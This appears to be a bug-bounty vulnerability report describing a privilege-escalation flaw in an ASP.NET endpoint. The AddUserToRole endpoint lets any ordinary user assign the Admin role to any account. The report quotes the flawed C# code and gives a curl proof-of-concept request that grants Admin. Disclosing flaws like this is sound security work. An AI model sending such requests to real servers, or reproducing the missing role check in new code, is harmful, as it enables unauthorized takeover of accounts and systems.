Normal user can set himself or any other user to admin role

2022-09-2018:53:21

0x41ly

www.huntr.dev

JSON

Description

Improper access to an API endpointAddUserToRole can allow a regular user to escalate his privileges to be an admin

Infected code

[Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task&lt;IActionResult&gt; AddUserToRole([FromQuery] string username, string role)
    {
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }

As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role

Proof of Concept

curl -X 'POST' \
  'http://&lt;SERVER&gt;/Auth/AddUserToRole?username=&lt;AnyUser&gt;&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: &lt;TOKEN&gt;' \
  -d ''

JSON